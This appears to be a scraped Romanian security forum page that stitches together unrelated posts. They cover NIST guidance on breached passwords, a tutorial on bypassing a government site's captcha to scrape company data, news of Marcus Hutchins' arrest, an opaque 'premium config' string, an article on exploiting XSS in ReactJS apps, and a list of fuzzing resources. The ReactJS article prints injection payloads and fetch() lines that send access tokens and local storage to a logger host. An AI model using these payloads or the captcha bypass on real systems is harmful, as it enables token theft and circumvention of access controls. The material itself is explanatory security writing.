Leaderboard

Last week I wrote about Passwords Evolved: Authentication Guidance for the Modern Era with the aim of helping those building services which require authentication to move into the modern era of how we think about protecting accounts. In that post, I talked about NIST's Digital Identity Guidelines which were recently released. Of particular interest to me was the section advising organisations to block subscribers from using passwords that have previously appeared in a data breach. Here's the full excerpt from the authentication & lifecycle management doc (CSP is "Credential Service Provider"): NIST isn't mincing words here, in fact they're quite clearly saying that you shouldn't be allowing people to use a password that's been breached before, among other types of passwords they shouldn't be using. The reasons for this should be obvious but just in case you're not fully aware of the risks, have a read of my recent post on password reuse, credential stuffing and another billion records in Have I been pwned (HIBP). As I read NIST's guidance, I realised I was in a unique position to help do something about the problem they're trying to address due to the volume of data I've obtained in running HIBP. https://www.troyhunt.com/introducing-306-million-freely-downloadable-pwned-passwords/ https://haveibeenpwned.com/Passwords

http://web.archive.org/web/20071011005152/http://rstzone.org:80/forum/ Stiu ca mai era un domeniu inainte, ceva cu romanian security group sau romanian security forum . La mai multi ani!

http://web.archive.org/web/20071026080353/http://rstzone.org:80/forum/member1337.rst il capo del tutti capi

Erau alte vremuri, alte "trend-uri".

Salutare! Acum 2 zile m-am apucat s? lucrez la o aplica?ie pentru iOS care s? afi?eze informa?ii despre o firm? anume, foarte util? pentru detectarea "firmelor fantom?" sau ob?inerea datelor despre o anumit? societate comercial?. Nu este chiar un tutorial de "hacking", pentru c? datele sunt publice ?i pot fi accesate de pe site-ul ministerului de finante. Problema apare în momentul în care dore?ti s? ob?ii aceste date în mod programatic, deoarece site-ul ministerului nu ofer? un API pentru programatori, ba chiar mai r?u, prezint? un captcha la solicitarea datelor. Screenshot: Desigur, primul meu gând a fost un captcha solver, dar nu este o solu?ie prea practic?. A?a c? m-am mai jucat pu?in, am mai întrebat pe diverse site-uri ?i am descoperit o alternativ?. Inspectând sursa paginii mfinante[punct]ro/agenticod.html observ?m c? formularul este procesat de pagina infocodfiscal.html iar parametrul pentru cif cod. Surpriza a ap?rut în momentul în care am descoperit c? cif-ul poate fi transmis ?i prin GET, iar în acest caz captcha-ul, nu mai este necesar. A?adar, datele pentru o firm? pot fi ob?inute accesând mfinante[punct]ro/infocodfiscal.html?cod=cifulfirmei. R?mâne o singur? problem? - în momentul în care vrem s? facem un request folosind cURL, suntem redirec?iona?i c?tre o pagin? care ne aten?ioneaz? c? trebuie s? avem javascript activat. Folosind o extensie pentru chrome, cum ar fi Postman, observ?m c? se mai transmit câ?iva parametrii prin POST: 'TS018732dc_id' => 3, 'TS018732dc_cr' => 'SESSIONID', 'TS018732dc_76' => 0, 'TS018732dc_86' => 0, 'TS018732dc_md' => 1, 'TS018732dc_rf' => 0, 'TS018732dc_ct' => 0, 'TS018732dc_pd' => 0 Parametrul TS018732dc_cr con?ine ID-ul de sesione, îl putem l?sa la varianta din Postman, datele vor fi afi?ate chiar dac? sesiunea a expirat. Asta e tot! Acum putem accesa pagina prin cURL ?i extrage datele folosind un DOM parser, gen DOMDocument dac? folosim php. Lista de bilan?uri poate fi ob?inut? dintr-un comment de deasupra op?iunilor pentru a nu fi nevoi?i s? pars?m fiecare op?iune. Dup? ce a?i ob?inut datele, aceste pot fi serializate în format JSON, XML sau orice alt format dori?i pentru a fi accesate de site-ul sau aplica?ia voastr?. Dac? dori?i s? pute?i c?uat dup? numele firmei, va trebui s? desc?rca?i ni?te csv-uri de pe data[punct]gov[punct]ro, ?terge?i toate coloanele în afar? de numele firmei ?i cif ?i le b?ga?i într-o baz? de date. Sper c? v-a fost util acest tutorial!

Authorities arrested the UK security researcher known for stopping the WannaCry ransomware attack in May. On Wednesday, 22-year-old Marcus Hutchins -- also known as MalwareTech -- was arrested in Las Vegas for "his role in creating and distributing the Kronos banking Trojan," according to a spokesperson from the U.S. Department of Justice. The charges relate to alleged conduct occurring between July 2014 and July 2015. According to an indictment provided to CNN Tech, Hutchins created the malware and shared it online. Earlier this year, Hutchins became an internet hero when he helped stop WannaCry, a cyberattack that targeted over 150 countries. The ransomware locked down computers and demanded $300 to get files back. Hutchins, who is a malware researcher at the Kryptos Logic security firm, created a killswitch that prevented the spread of the virus. Friends and family have not been able to speak with Hutchins, according to a person close to the situation. The news of the detention was first reported by Motherboard. This story is developing. sursa: http://money.cnn.com/2017/08/03/technology/culture/malwaretech-arrested-las-vegas-trojan/index.html acuzarea: https://www.documentcloud.org/documents/3912524-Kronos-Indictment-R.html pe acelasi subiect: https://motherboard.vice.com/en_us/article/ywp8k5/researcher-who-stopped-wannacry-ransomware-detained-in-us-after-def-con https://www.theguardian.com/technology/2017/aug/03/researcher-who-stopped-wannacry-ransomware-detained-in-us?CMP=share_btn_tw

Config premium pentru Social Rockstar. G7 DWfeqSzdy0963x3xBdNmXIO5qWOdD+Kbw0hMEre63RnagO36CzhBwRnID8YOtI1eE85G

Am cumparat doua site-uri de la el, sunt multumit, am dat primul si nu au fost probleme. Recomand!

Hacking Livestream #28: Windows Kernel Debugging Part I Artem "honorary_bot" Shishkin is a fan of Windows RE, debugging and low-level stuff. He's been using WinDbg for kernel debugging for several years now for fun, customizing BSODs, building Windows kernel source tree or boot dependencies graph. Sometimes he might also accidentally discover such things as SMEP bypass on Windows 8 or how to disable PatchGuard in runtime. Being a great fan of Intel and specifically VMX technology he maintains his own bicycle debugger based on a bare metal hypervisor. Twitter handle: https://twitter.com/honorary_bot Github: https://github.com/honorarybot/ Links from the stream: Books: https://www.amazon.com/Windows-Intern... https://www.amazon.com/Windows-Intern... https://www.amazon.com/Programming-Mi... https://www.amazon.com/Developing-Win... VirtualKD http://virtualkd.sysprogs.org/ USB 3.0 debugging cable (example): https://www.datapro.net/products/usb-... Network card IDs for network debugging: https://docs.microsoft.com/en-us/wind...

Bernhard Mueller Uncertified Software Security Professional. Pwnie Winner ヽ(゜∇゜)ノ Aug 2 Exploiting Script Injection Flaws in ReactJS Apps ReactJS is a popular JavaScript library for building user interfaces. It enables client-rendered, “rich” web apps that load entirely upfront, allowing for a smoother user experience. Given that React apps implement a whole lot of client-side logic in JavaScript, it doesn’t seem far-fetched to assume that XSS-type attacks could be worthwhile. As it turns out, ReactJS is quite safe by design as long as it is used the way it’s meant to be used. For example, string variables in views are escaped automatically. However, as with all good things in life, it’s not impossible to mess things up. Script injection issues can result from bad programming practices including the following: Creating React components from user-supplied objects; Rendering links with user-supplied href attributes, or other HTML tags with injectable attributes (link tag, HMTL5 imports); Explicitly setting the dangerouslySetInnerHTML prop of an element; Passing user-supplied strings to eval(). In a world ruled by Murphy’s law, all of this is guaranteed to happen, so let’s have a closer look. Components, Props and Elements Components are the basic building block of ReactJS. Conceptually, they are like JavaScript functions. They accept arbitrary inputs (“props”) and return React elements describing what should appear on the screen. A basic component looks as follows: class Welcome extends React.Component { render() { return <h1>Hello, {this.props.name}</h1>; } } Note the weird syntax in the return statement: This is JSX, a syntax extension to JavaScript. During the build process, the JSX code is transpiledto regular JavaScript (ES5) code. The following two examples are identical: // JSX const element = ( <h1 className=”greeting”> Hello, world! </h1> ); // Transpiled to createElement() call const element = React.createElement( ‘h1’, {className: ‘greeting’}, ‘Hello, world!’ ); New React elements are created from component classes using the createElement() function: React.createElement( type, [props], [...children] ) This function takes three arguments: type can be either a tag name string (such as 'div' or 'span'), or a component class. In React Native, only component classes are allowed. props contains a list of attributes passed to the new element. children contains the child node(s) of the new element (which, in turn, are more React components). Several attack vectors exist if you can control any of those arguments. Injecting Child Nodes In March 2015, Daniel LeCheminant reported a stored cross-site scripting vulnerability in HackerOne. The issue was caused by the HackerOne web app passing an arbitrary, user-supplied object as the children argument to React.createElement(). Presumably, the vulnerable code must have looked somewhat like the following: /* Retrieve a user-supplied, stored value from the server and parsed it as JSON for whatever reason. attacker_supplied_value = JSON.parse(some_user_input) */ render() { return <span>{attacker_supplied_value}</span>; } This JSX would translate to the following JavaScript: React.createElement("span", null, attacker_supplied_value}; When attacker_supplied_value was a string as expected, this would produce a regular span element. However, the createElement() function in the then-current version of ReactJS would also accept plain objects passed as children. Daniel exploited the issue by supplying a JSON-encoded object. He included the dangerouslySetInnerHTML prop, allowing him to insert raw HTML into the output rendered by React. His final proof-of-concept looked as follows: { _isReactElement: true, _store: {}, type: “body”, props: { dangerouslySetInnerHTML: { __html: "<h1>Arbitrary HTML</h1> <script>alert(‘No CSP Support :(‘)</script> <a href=’http://danlec.com'>link</a>" } } } Following Daniel’s blog post, potential mitigations were discussed on the React.js GitHub. In November 2015, Sebastian Markbåge commited a fix: React elements were now tagged with the attribute$$typeof: Symbol.for('react.element'). Because there is no way to reference a global JavaScript symbol from an injected object, Daniel’s technique of injecting child elements can’t be used anymore. Controlling Element Type Even though plain objects are no longer work as ReactJS elements, component injection still isn’t completely impossible, because createElementalso accepts strings in the type argument. Suppose a developer did something like this: // Dynamically create an element from a string stored in the backend. element_name = stored_value; React.createElement(element_name, null); If stored_valuewas an attacker-controlled string, it would be possible to create an arbitrary React component. However, this would result only in a plain, attribute-less HTML element (i.e. pretty useless to the attacker). To do something useful, one must be able to control the properties of the newly created element. Injecting Props Consider the following code: // Parse attacker-supplied JSON for some reason and pass // the resulting object as props. // Don't do this at home unless you are a trained expert! attacker_props = JSON.parse(stored_value) React.createElement("span", attacker_props}; Here, we can inject arbitrary props into the new element. We could use the following payload to set the dangerouslySetInnerHTML property: {"dangerouslySetInnerHTML" : { "__html": "<img src=x/ onerror=’alert(localStorage.access_token)’>"}} Classical XSS Some traditional XSS vectors are also viable in ReactJS apps. Look out for the following anti-patterns: Explicitly Setting dangerouslySetInnerHTML Developers may choose to set the dangerouslySetInnerHTML prop on purpose. <div dangerouslySetInnerHTML={user_supplied} /> Obviously, if you control the value of that prop, you can insert any JavaScript your heart desires. Injectable Attributes If you control the href attribute of a dynamically generated a tag, there’s nothing to prevent you from injection a javascript: URL. Some other attributes such as formaction in HTML5 buttons also work in modern browser. <a href={userinput}>Link</a> <button form="name" formaction={userinput}> Another exotic injection vector that would work in modern browsers are HTML5 imports: <link rel=”import” href={user_supplied}> Server-Side Rendered HTML To improve initial page load times, there has lately been a trend towards pre-rendering React.JS pages on the server (“server-side rendering”). In November 2016, Emilia Smith pointed out that the official Redux code sample for SSR resulted in a cross-site scripting vulnerability, because the client state was concatenated into the pre-rendered page without escaping (the sample code has since been fixed). The take-away: If HTML is pre-rendered on the server-side, you might see the same types of XSS issues found in “regular” web apps. Eval-based injection If the app uses eval() to dynamically execute an injectable string under your control, you have hit the jackpot. In that case, you may proceed to inject arbitrary code of your choosing. function antiPattern() { eval(this.state.attacker_supplied); } XSS Payload In the modern world, session cookies are as outdated as manual typewriters and McGyver-style mullets. The agile developer of today uses stateless session tokens, elegantly saved in client-side local storage. Consequently, hackers must adapt their payloads accordingly. When exploiting an XSS attack a ReactJS web app, you could inject something along the following lines to retrieve an access token from local storage and sent it to your logger: fetch(‘http://example.com/logger.php?token='+localStorage.access_token); How About React Native? React Native is a mobile app framework that allows you to build nativemobile applications using ReactJS. More specifically, it provides you with a runtime that can run React JavaScript bundles on mobile devices. In true Inception style, you can “port” a React Native App to work in regular web browsers using React Native for Web (web app in a mobile app in a web app). This means that you build apps from Android, iOS and Desktop browser from a single code base. From what I’ve seen so far, most of the script injection vectors mentioned above don’t work in React Native: React Native’s createInternalComponent method only accepts tagged component classes, so even if you fully control the arguments to createElement() you can’t create arbitrary elements; HTML elements don’t exist, and HTML isn’t parsed, so typical browser-based XSS vectors (e.g. href) can’t be used. Only the eval() based variant seems to be exploitable on mobile devices. If you do get JavaScript code injected through eval(), you can access React Native APIs and do interesting things. For example, you could steal all the data from local storage (AsyncStorage) by doing something like: _reactNative.AsyncStorage.getAllKeys(function(err,result){_reactNative.AsyncStorage.multiGet(result,function(err,result){fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});}); TL;DR Even though ReactJS is quite safe by design, it’s not impossible to mess things up. Bad programming practices can lead to exploitable security vulnerabilities. Security Testers: Inject JavaScript and JSON wherever you can and see what happens. Developers: Don’t ever useeval() or dangerouslySetInnerHTML. Avoid parsing user-supplied JSON. React Security Application Security Hacking Penetration Testing Bernhard Mueller Uncertified Software Security Professional. Pwnie Winner ヽ(゜∇゜)ノ Sursa: https://medium.com/@muellerberndt/exploiting-script-injection-flaws-in-reactjs-883fb1fe36c1

Welcome to Awesome Fuzzing A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis. Table of Contents Books Courses Free Paid Videos NYU Poly Course videos Conference talks and tutorials Tutorials and Blogs Tools File Format Fuzzers Network Protocol Fuzzers Taint Analysis Symbolic Execution SAT and SMT Solvers Essential Tools Vulnerable Applications Anti-Fuzzing Contributing Awesome Fuzzing Resources Books Books on fuzzing Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton, Adam Greene, Pedram Amini. Fuzzing for Software Security Testing and Quality Assurance by Ari Takanen, Charles Miller, and Jared D Demott. Open Source Fuzzing Tools by by Gadi Evron and Noam Rathaus. Gray Hat Python by Justin Seitz. Note: Chapter(s) in the following books are dedicated to fuzzing. The Shellcoder's Handbook: Discovering and Exploiting Security Holes ( Chapter 15 ) by Chris Anley, Dave Aitel, David Litchfield and others. iOS Hacker's Handbook - Chapter 1 Charles Miller, Dino DaiZovi, Dion Blazakis, Ralf-Philip Weinmann, and Stefan Esser. IDA Pro - The IDA Pro Book: The Unofficial Guide to the World's Most Popular Disassembler Courses Courses/Training videos on fuzzing Free NYU Poly ( see videos for more ) - Made available freely by Dan Guido. Samclass.info ( check projects section and chapter 17 ) - by Sam. Modern Binary Exploitation ( RPISEC ) - Chapter 15 - by RPISEC. Offensive Computer Security - Week 6 - by W. Owen Redwood and Prof. Xiuwen Liu. Paid Offensive Security, Cracking The Perimeter ( CTP ) and Advanced Windows Exploitation ( AWE ) SANS 660/760 Advanced Exploit Development for Penetration Testers Exodus Intelligence - Vulnerability development master class Videos Videos talking about fuzzing techniques, tools and best practices NYU Poly Course videos Fuzzing 101 (Part 1) - by Mike Zusman. Fuzzing 101 (Part 2) - by Mike Zusman. Fuzzing 101 (2009) - by Mike Zusman. Fuzzing - Software Security Course on Coursera - by University of Maryland. Conference talks and tutorials Youtube Playlist of various fuzzing talks and presentations - Lots of good content in these videos. Browser bug hunting - Memoirs of a last man standing - by Atte Kettunen Coverage-based Greybox Fuzzing as Markov Chain Tutorials and Blogs Tutorials and blogs which explain methodology, techniques and best practices of fuzzing [2016 articles] Effective File Format Fuzzing - Mateusz “j00ru” Jurczyk @ Black Hat Europe 2016, London A year of Windows kernel font fuzzing Part-1 the results - Amazing article by Google's Project Zero, describing what it takes to do fuzzing and create fuzzers. A year of Windows kernel font fuzzing Part-2 the techniques - Amazing article by Google's Project Zero, describing what it takes to do fuzzing and create fuzzers. Interesting bugs and resources at fuzzing project - by fuzzing-project.org. Fuzzing workflows; a fuzz job from start to finish - by @BrandonPrry. A gentle introduction to fuzzing C++ code with AFL and libFuzzer - by Jeff Trull. A 15 minute introduction to fuzzing - by folks at MWR Security. Note: Folks at fuzzing.info has done a great job of collecting some awesome links, I'm not going to duplicate their work. I will add papers missed by them and from 2015 and 2016. Fuzzing Papers - by fuzzing.info Fuzzing Blogs - by fuzzing.info Root Cause Analysis of the Crash during Fuzzing - by Corelan Team. Root cause analysis of integer flow - by Corelan Team. Creating custom peach fuzzer publishers - by Open Security Research 7 Things to Consider Before Fuzzing a Large Open Source Project - by Emily Ratliff. From Fuzzing to Exploit: From fuzzing to 0-day - by Harold Rodriguez(@superkojiman). From crash to exploit - by Corelan Team. Peach Fuzzer related tutorials Getting Started with Peach Fuzzing with Peach Part 1 - by Jason Kratzer of corelan team Fuzzing with Peach Part 2 - by Jason Kratzer of corelan team. Auto generation of Peach pit files/fuzzers - by Frédéric Guihéry, Georges Bossert. AFL Fuzzer related tutorials Fuzzing workflows; a fuzz job from start to finish - by @BrandonPrry. Fuzzing capstone using AFL persistent mode - by @toasted_flakes RAM disks and saving your SSD from AFL Fuzzing Bug Hunting with American Fuzzy Lop Advanced usage of American Fuzzy Lop with real world examples Segfaulting Python with afl-fuzz Fuzzing Perl: A Tale of Two American Fuzzy Lops Fuzzing With AFL-Fuzz, a Practical Example ( AFL vs Binutils ) The Importance of Fuzzing...Emulators? How Heartbleed could've been found Filesystem Fuzzing with American Fuzzy lop Fuzzing Perl/XS modules with AFL How to fuzz a server with American Fuzzy Lop - by Jonathan Foote libFuzzer Fuzzer related tutorials libFuzzer Tutorial libFuzzer Workshop: "Modern fuzzing of C/C++ Projects" Spike Fuzzer related tutorials Fuzzing with Spike to find overflows Fuzzing with Spike - by samclass.info FOE Fuzzer related tutorials Fuzzing with FOE - by Samclass.info SMT/SAT solver tutorials Z3 - A guide - Getting Started with Z3: A Guide Tools Tools which helps in fuzzing applications File Format Fuzzers Fuzzers which helps in fuzzing file formats like pdf, mp3, swf etc., MiniFuzz - Basic file format fuzzing tool by Microsoft. BFF from CERT - Basic Fuzzing Framework for file formats. AFL Fuzzer (Linux only) - American Fuzzy Lop Fuzzer by Michal Zalewski aka lcamtuf Win AFL - A fork of AFL for fuzzing Windows binaries by Ivan Fratic Shellphish Fuzzer - A Python interface to AFL, allowing for easy injection of testcases and other functionality. TriforceAFL - A modified version of AFL that supports fuzzing for applications whose source code not available. Peach Fuzzer - Framework which helps to create custom dumb and smart fuzzers. MozPeach - A fork of peach 2.7 by Mozilla Security. Failure Observation Engine (FOE) - mutational file-based fuzz testing tool for windows applications. rmadair - mutation based file fuzzer that uses PyDBG to monitor for signals of interest. honggfuzz - A general-purpose, easy-to-use fuzzer with interesting analysis options. Supports feedback-driven fuzzing based on code coverage. Supports GNU/Linux, FreeBSD, Mac OSX and Android. zzuf - A transparent application input fuzzer. It works by intercepting file operations and changing random bits in the program's input. radamsa - A general purpose fuzzer and test case generator. binspector - A binary format analysis and fuzzing tool Network Protocol Fuzzers Fuzzers which helps in fuzzing applications which use network based protocals like HTTP, SSH, SMTP etc., Peach Fuzzer - Framework which helps to create custom dumb and smart fuzzers. Sulley - A fuzzer development and fuzz testing framework consisting of multiple extensible components by Michael Sutton. boofuzz - A fork and successor of Sulley framework. Spike - A fuzzer development framework like sulley, a predecessor of sulley. Metasploit Framework - A framework which contains some fuzzing capabilities via Auxiliary modules. Nightmare - A distributed fuzzing testing suite with web administration, supports fuzzing using network protocols. rage_fuzzer - A dumb protocol-unaware packet fuzzer/replayer. Misc Other notable fuzzers like Kernel Fuzzers, general purpose fuzzer etc., KernelFuzzer - Cross Platform Kernel Fuzzer Framework. honggfuzz - A general-purpose, easy-to-use fuzzer with interesting analysis options. Hodor Fuzzer - Yet Another general purpose fuzzer. libFuzzer - In-process, coverage-guided, evolutionary fuzzing engine for targets written in C/C++. syzkaller - Distributed, unsupervised, coverage-guided Linux syscall fuzzer. ansvif - An advanced cross platform fuzzing framework designed to find vulnerabilities in C/C++ code. Taint Analysis How user input affects the execution PANDA ( Platform for Architecture-Neutral Dynamic Analysis ) QIRA (QEMU Interactive Runtime Analyser) Symbolic Execution SAT and SMT Solvers Z3 - A theorem prover from Microsoft Research. SMT-LIB - An international initiative aimed at facilitating research and development in Satisfiability Modulo Theories (SMT) References I haven't included some of the legends like AxMan, please refer the following link for more information.https://www.ee.oulu.fi/research/ouspg/Fuzzers Essential Tools Tools of the trade for exploit developers, reverse engineers Debuggers Windbg - The preferred debugger by exploit writers. Immunity Debugger - Immunity Debugger by Immunity Sec. OllyDbg - The debugger of choice by reverse engineers and exploit writers alike. Mona.py ( Plugin for windbg and Immunity dbg ) - Awesome tools that makes life easy for exploit developers. x64dbg - An open-source x64/x32 debugger for windows. Evan's Debugger (EDB) - Front end for gdb. GDB - Gnu Debugger - The favorite linux debugger. PEDA - Python Exploit Development Assistance for GDB. Radare2 - Framework for reverse-engineering and analyzing binaries. Disassemblers and some more Dissemblers, disassembly frameworks etc., IDA Pro - The best disassembler binnavi - Binary analysis IDE, annotates control flow graphs and call graphs of disassembled code. Capstone - Capstone is a lightweight multi-platform, multi-architecture disassembly framework. Others ltrace - Intercepts library calls strace - Intercepts system calls Vulnerable Applications Exploit-DB - https://www.exploit-db.com (search and pick the exploits, which have respective apps available for download, reproduce the exploit by using fuzzer of your choice) PacketStorm - https://packetstormsecurity.com/files/tags/exploit/ Fuzzgoat - Vulnerable C program for testing fuzzers. Samples files for seeding during fuzzing: https://files.fuzzing-project.org/ PDF Test Corpus from Mozilla MS Office file format documentation Fuzzer Test Suite - Set of tests for fuzzing engines. Includes different well-known bugs such as Heartbleed, c-ares $100K bug and others. Anti Fuzzing Introduction to Anti-Fuzzing: A Defence In-Depth Aid Contributing Please refer the guidelines at contributing.md for details. Thanks to the following folks who made contributions to this project. Tim Strazzere jksecurity Sursa: https://github.com/secfigo/Awesome-Fuzzing/blob/master/README.md